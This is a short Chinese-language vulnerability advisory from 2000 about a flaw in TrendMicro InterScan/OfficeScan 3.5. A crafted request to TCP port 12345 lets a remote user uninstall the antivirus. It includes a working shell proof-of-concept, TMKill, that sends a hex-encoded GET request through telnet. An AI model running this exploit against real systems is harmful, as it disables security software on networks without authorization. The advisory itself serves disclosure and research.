TrendMicro InterScan允许远程卸载
发布日期:2000-03-04
更新日期:2000-03-06
受影响系统:OfficeScan 3.5
描述:
来源:Veille Technologique <gdn@neurocom.com>
通过向InterScan监听的特定端口(12345/TCP)发送特殊的TCP请求,能够远程卸载该反病毒软件包。这个安全问题允许恶意用户未经授权远程卸载公司网络中的每个OfficeScan。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/sh
#
# Usage: TMKill target_ip
# gdn@neurocom.com ( Gregory Duchemin )
#
(
sleep 2
echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E35269372543
0DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5D
EE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C547766
50D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC43323
0F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A9
59BF634112B4F9A93953B8F64B02C881ED6C55BFCD6205613
4BBF8007EFFB66435181A7762EE02B8913F545D2511897C89
8F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD
2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE
40445DD6CD11CE11A9904 HTTP/1.0"
#NOTE: The above string was wrapped for readability. It should be on one
long line.
echo "Host:"$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept:*/*"
echo
sleep 10 )| telnet $1 12345 2>&1 | tee -a ./log.txt
建议:
暂无
浏览次数:6320
严重程度:0(网友投票)
